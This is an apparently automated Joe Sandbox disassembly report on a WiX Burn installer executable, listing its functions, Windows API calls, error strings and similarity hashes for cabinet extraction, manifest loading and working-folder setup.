Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3884789274-2391192076
Opcode ID: 518488f12de80ed85a4a44873630521d09d7a9a94340fcd075b083bb7be6278e
Instruction ID: 2efe447ea1a5939045b807d34dcd556d04c2ec6ab36cb8e452adc65e15b8a93e
Opcode Fuzzy Hash: 518488f12de80ed85a4a44873630521d09d7a9a94340fcd075b083bb7be6278e
Instruction Fuzzy Hash: 67718672D44229ABCB219B94CC85FEFBB78BF04720F114269F950B7291D7B19A41CBE0

Function 000D752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get source process folder from path., xrefs: 000D7725
Failed to set source process folder variable., xrefs: 000D7745
WixBundleSourceProcessPath, xrefs: 000D76F8
Failed to open attached UX container., xrefs: 000D758E
Failed to overwrite the %ls built-in variable., xrefs: 000D76BB
Failed to load catalog files., xrefs: 000D780F
WixBundleOriginalSource, xrefs: 000D7759
Failed to get manifest stream from container., xrefs: 000D75CC
Failed to get unique temporary folder for bootstrapper application., xrefs: 000D77CE
WixBundleUILevel, xrefs: 000D76D6, 000D76E7
Failed to set original source variable., xrefs: 000D776A
WixBundleSourceProcessFolder, xrefs: 000D7734
Failed to set source process path variable., xrefs: 000D7709
Failed to initialize internal cache functionality., xrefs: 000D779F
Failed to load manifest., xrefs: 000D75E8
Failed to open manifest stream., xrefs: 000D75AB
Failed to initialize variables., xrefs: 000D7571
Failed to extract bootstrapper application payloads., xrefs: 000D77EF
WixBundleElevated, xrefs: 000D76A5, 000D76B6
Failed to parse command line., xrefs: 000D7667

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 78882ba5da7e707c6290b133244b114aae988d68c4a082fc49bee77871222734
Instruction ID: d41288380448dd8472b61fef655a01fa6b580d83040c04c85142adaf28ee031a
Opcode Fuzzy Hash: 78882ba5da7e707c6290b133244b114aae988d68c4a082fc49bee77871222734
Instruction Fuzzy Hash: 01A17472A44715BBDB269BA4CC45FEEB7ACBB04700F004627F919E7241EB71A9449BF0

Function 000D86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,000C4DBC,?,?,00000000,000C4DBC,00000000), ref: 000D8713
GetLastError.KERNEL32 ref: 000D8720

Part of subcall function 00103EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00103F73

SetFilePointerEx.KERNEL32(00000000,0010B4B8,00000000,00000000,00000000,?,00000000,0010B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000D87CD
GetLastError.KERNEL32 ref: 000D87D7
CloseHandle.KERNELBASE(00000000,?,00000000,0010B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000D8902

Strings

Failed to seek to beginning of engine file: %ls, xrefs: 000D8779
Failed to copy engine from: %ls to: %ls, xrefs: 000D87A8
Failed to seek to original data in exe burn section header., xrefs: 000D88DB
cabinet.dll, xrefs: 000D887B
Failed to zero out original data offset., xrefs: 000D88F4
msi.dll, xrefs: 000D8814
Failed to update signature offset., xrefs: 000D8821
Failed to seek to checksum in exe header., xrefs: 000D8805
Failed to seek to signature table in exe header., xrefs: 000D886C
cache.cpp, xrefs: 000D8744, 000D87FB, 000D8862, 000D88D1
Failed to create engine file at path: %ls, xrefs: 000D8751

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 3456208997-1976062716
Opcode ID: 3fce7929a590fba31c256a24e4c69c20aab13a6d999dd1cc9c49631f4296337f
Instruction ID: ef9a93e27647d5895b2ffc75ba85a9d24818271b3252830da2d605cfed9a138f
Opcode Fuzzy Hash: 3fce7929a590fba31c256a24e4c69c20aab13a6d999dd1cc9c49631f4296337f
Instruction Fuzzy Hash: D3519472A45335ABD7225A548C46FBF7668AF04B20F118126FE50BB381EF619C4097F5

Function 000C762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(000D756B,000C53BD,00000000,000C5445), ref: 000C764C

Strings

Date, xrefs: 000C7770
WixBundleProviderKey, xrefs: 000C7E7E
WixBundleSourceProcessPath, xrefs: 000C7E8E
', xrefs: 000C78EB
WixBundleUILevel, xrefs: 000C7EBE
InstallerName, xrefs: 000C7812
WixBundleTag, xrefs: 000C7EAE
WixBundleSourceProcessFolder, xrefs: 000C7E9E
WixBundleInstalled, xrefs: 000C7E2A
WixBundleAction, xrefs: 000C7D76
WixBundleExecutePackageAction, xrefs: 000C7DF8
LogonUser, xrefs: 000C7882
InstallerVersion, xrefs: 000C7833
0, xrefs: 000C7663
WixBundleActiveParent, xrefs: 000C7E62
WixBundleForcedRestartPackage, xrefs: 000C7E14
$, xrefs: 000C7D49
WixBundleElevated, xrefs: 000C7E46
WixBundleVersion, xrefs: 000C7ECE
#, xrefs: 000C76CB
WixBundleExecutePackageCacheFolder, xrefs: 000C7D98
Failed to add built-in variable: %ls., xrefs: 000C7F19

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: 2068adc9d2f5ec42c90d6f9b5e857027ea54b681ff902f2cd8a8c5851d5f2cfa
Instruction ID: 5dc0ad6c6f6d666edc548cde9a8d39561bd05a4ecc07e9b987bb372f563631af
Opcode Fuzzy Hash: 2068adc9d2f5ec42c90d6f9b5e857027ea54b681ff902f2cd8a8c5851d5f2cfa
Instruction Fuzzy Hash: 6E3268B0C116299FDB65CF5AC9887CDFAB4BB48304F5082EED24CB6250C7B51B898F85

Function 000D82BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,000C5489), ref: 000D8310

Part of subcall function 00100879: OpenProcessToken.ADVAPI32(?,00000008,?,000C53BD,00000000,?,?,?,?,?,?,?,000D769D,00000000), ref: 00100897
Part of subcall function 00100879: GetLastError.KERNEL32(?,?,?,?,?,?,?,000D769D,00000000), ref: 001008A1
Part of subcall function 00100879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,000D769D,00000000), ref: 0010092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 000D8336
GetLastError.KERNEL32 ref: 000D8340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000D83BD
GetLastError.KERNEL32 ref: 000D83C7
UuidCreate.RPCRT4(?), ref: 000D8406

Strings

Failed to ensure windows path for working folder ended in backslash., xrefs: 000D838B
Failed to create working folder guid., xrefs: 000D8413
Failed to append bundle id on to temp path for working folder., xrefs: 000D8470
%ls%ls\, xrefs: 000D8458
Failed to get temp path for working folder., xrefs: 000D83F5
Failed to get windows path for working folder., xrefs: 000D836E
Failed to convert working folder guid into string., xrefs: 000D8446
cache.cpp, xrefs: 000D8364, 000D83EB, 000D843C
Failed to copy working folder path., xrefs: 000D848B
4Mw, xrefs: 000D83BD
Failed to concat Temp directory on windows path for working folder., xrefs: 000D83AD
Temp\, xrefs: 000D8395

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Mw$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-1835725942
Opcode ID: 8dfb35677f25e1ff464948a6f4b248c5986349e6b3de67f76f37a66563409667
Instruction ID: 8e8963bcba3ce814911ed90d1a6a71bd2868c4f4c272da4f1e485891982d7f01
Opcode Fuzzy Hash: 8dfb35677f25e1ff464948a6f4b248c5986349e6b3de67f76f37a66563409667
Instruction Fuzzy Hash: C141F876E45325B7D730A6A08C49FDF73A8AB04B10F118166BA08F7240EFB59D848BF1

Function 000E10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000E111D
CoUninitialize.COMBASE ref: 000E1398

Strings

<the>.cab, xrefs: 000E11BD
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 000E1279
cabextract.cpp, xrefs: 000E1193, 000E12BA, 000E1307, 000E1346, 000E1372
Failed to set operation complete event., xrefs: 000E12C4
Invalid operation for this state., xrefs: 000E137C
Failed to reset begin operation event., xrefs: 000E1350
Failed to wait for begin operation event., xrefs: 000E1311
Failed to initialize cabinet.dll., xrefs: 000E119F
Failed to initialize COM., xrefs: 000E1129

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 0d01bbb5ca275932d3c9f81e1f377d43e1645342091fd88831e97886607fa57e
Instruction ID: f9265563d0e120e7e4ba8fac68d0bc7b687b2f31dd9f8c3f9a2c7d65f765e562
Opcode Fuzzy Hash: 0d01bbb5ca275932d3c9f81e1f377d43e1645342091fd88831e97886607fa57e
Instruction Fuzzy Hash: 68515736E452E1EFCB3056A68C41EFF3A649B05720B22432ABE11FF6D1D7758D5082D1

Function 000C42D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,000C5266,?,?,00000000,?,?), ref: 000C4303
InitializeCriticalSection.KERNEL32(000000D0,?,?,000C5266,?,?,00000000,?,?), ref: 000C430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,000C5266,?,?,00000000,?,?), ref: 000C4352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,000C5266,?,?,00000000,?,?), ref: 000C435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000C5266,?,?,00000000,?,?), ref: 000C4370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,000C5266,?,?,00000000,?,?), ref: 000C4380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,000C5266,?,?,00000000,?,?), ref: 000C43D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,000C5266,?,?,00000000,?,?), ref: 000C43DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000C5266,?,?,00000000,?,?), ref: 000C43EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,000C5266,?,?,00000000,?,?), ref: 000C43FE

Strings

burn.filehandle.attached, xrefs: 000C434D, 000C4355, 000C435A, 000C435B, 000C437B, 000C449F
Missing required parameter for switch: %ls, xrefs: 000C44A4
engine.cpp, xrefs: 000C4495, 000C44C1
Failed to parse file handle: '%ls', xrefs: 000C4482
burn.filehandle.self, xrefs: 000C43CB, 000C43D3, 000C43D8, 000C43D9, 000C43F9, 000C44CB
Failed to initialize engine section., xrefs: 000C4467

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: 06ffb00201c5938d28a468689b30bd843db3deafb6dbca46c02517631e324369
Instruction ID: 289ad4c754613b6a6efc74c008d331bbfbf0ce7051e863f3f0fff8b0ca5e06f5
Opcode Fuzzy Hash: 06ffb00201c5938d28a468689b30bd843db3deafb6dbca46c02517631e324369
Instruction Fuzzy Hash: 7C51A171A44215BFCB24EB68DC96F9E77ACFF04760F10411AFA54E7291DBB0A950CBA0

Function 000CC28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,000CC47F,000C5405,?,?,000C5445), ref: 000CC2D6
GetLastError.KERNEL32(?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?), ref: 000CC336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC33C
DuplicateHandle.KERNELBASE(00000000,?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC33F
GetLastError.KERNEL32(?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC39B
GetLastError.KERNEL32(?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000CC3A5

Strings

Failed to open container., xrefs: 000CC3F1
feclient.dll, xrefs: 000CC398
container.cpp, xrefs: 000CC30B, 000CC36D, 000CC3C9
crypt32.dll, xrefs: 000CC397
Failed to duplicate handle to container: %ls, xrefs: 000CC37A
Failed to open file: %ls, xrefs: 000CC318
Failed to move file pointer to container offset., xrefs: 000CC3D3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 6accceb8eb4ee85853749c909d9d33f5785b2fbfa67fa1fb04d5dcd31ec41990
Instruction ID: 5881de456e0fa222d3a60ea25333aa52a4f4fd60c494927f12bb8f3cc25b7b0f
Opcode Fuzzy Hash: 6accceb8eb4ee85853749c909d9d33f5785b2fbfa67fa1fb04d5dcd31ec41990
Instruction Fuzzy Hash: 2A41E776540241ABEB219F59DC49F5F3BB5EBC4720F21C02DF958AB282DBB1C901DBA0

Function 00102AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000C3877
Part of subcall function 000C3838: GetLastError.KERNEL32 ref: 000C3881

Part of subcall function 00104A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00104A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00102B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00102B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00102B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00102BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00102BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00102BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00102C01

Strings

MsiEnumProductsExW, xrefs: 00102B76
MsiSetExternalUIRecord, xrefs: 00102BD6
Msi.dll, xrefs: 00102B09
MsiDeterminePatchSequenceW, xrefs: 00102B36
MsiGetProductInfoExW, xrefs: 00102BB6
MsiGetPatchInfoExW, xrefs: 00102B96
MsiDetermineApplicablePatchesW, xrefs: 00102B56
MsiSourceListAddSourceExW, xrefs: 00102BF6

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: edeef4e77ff9326e6803a07ed11510502d6950145b61fc64ecfbb90aaead7cfe
Instruction ID: fecc56db3421264210bba0ff58327688e79ae0a60969f3c9883593b855dc0029
Opcode Fuzzy Hash: edeef4e77ff9326e6803a07ed11510502d6950145b61fc64ecfbb90aaead7cfe
Instruction Fuzzy Hash: 5331D4B0949618FFEB219F21ED86B697BA5F714704F00012AE44456DB0E7B218BAEF54

Function 000E1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,000CC3EB,?,00000000,?,000CC47F), ref: 000E1778
GetLastError.KERNEL32(?,000CC3EB,?,00000000,?,000CC47F,000C5405,?,?,000C5445,000C5445,00000000,?,00000000), ref: 000E1781

Strings

Failed to create operation complete event., xrefs: 000E17F5
wininet.dll, xrefs: 000E1757
Failed to create extraction thread., xrefs: 000E1841
cabextract.cpp, xrefs: 000E17A5, 000E17EB, 000E1837
Failed to create begin operation event., xrefs: 000E17AF
Failed to wait for operation complete., xrefs: 000E1854
Failed to copy file name., xrefs: 000E1763

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: d31696e38546896e5d8b8167518d5fa3af08e737390ae7385c3381925b063744
Instruction ID: c50999856dbfbfbd68edc383332f7465e5e60abbe6940f2b67a400c70edb4187
Opcode Fuzzy Hash: d31696e38546896e5d8b8167518d5fa3af08e737390ae7385c3381925b063744
Instruction Fuzzy Hash: 9A212977E8577A7ED33116A64D45FEB6AACEF00BB0B024225BD41BB681EB70DC4085E1

Function 000FFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 000FFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 000FFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 000FFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000FFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 000FFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000FFD8B

Strings

AdvApi32.dll, xrefs: 000FFCB5
CryptUnprotectMemory, xrefs: 000FFD6C
SystemFunction041, xrefs: 000FFCD8
SystemFunction040, xrefs: 000FFCCB
Crypt32.dll, xrefs: 000FFD0C
CryptProtectMemory, xrefs: 000FFD20
cryputil.cpp, xrefs: 000FFD60

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: d6b2f3f241e2db505790e6402205a0756976fa606902a952e835443da165cb97
Instruction ID: d6a2348af324f5971cd8ae158c2a13d4377c893a1c16e6e10efcebd4af165436
Opcode Fuzzy Hash: d6b2f3f241e2db505790e6402205a0756976fa606902a952e835443da165cb97
Instruction Fuzzy Hash: 8921C83294433BA7C3319B11AD4577A6A91AF00B50F064135EE00AEEA1EB759C92AAD0

Function 000E08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 000E08F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 000E090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 000E090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 000E0912
GetLastError.KERNEL32(?,?), ref: 000E091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000E098B
GetLastError.KERNEL32(?,?), ref: 000E0998

Strings

<the>.cab, xrefs: 000E08EB
Failed to duplicate handle to cab container., xrefs: 000E094A
cabextract.cpp, xrefs: 000E0940, 000E09BC
Failed to open cabinet file: %hs, xrefs: 000E09C9
Failed to add virtual file pointer for cab container., xrefs: 000E0971

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: cd785597ebf7a4bc0a23482b9824a1f0730549526246bf2ba3c94809959687f0
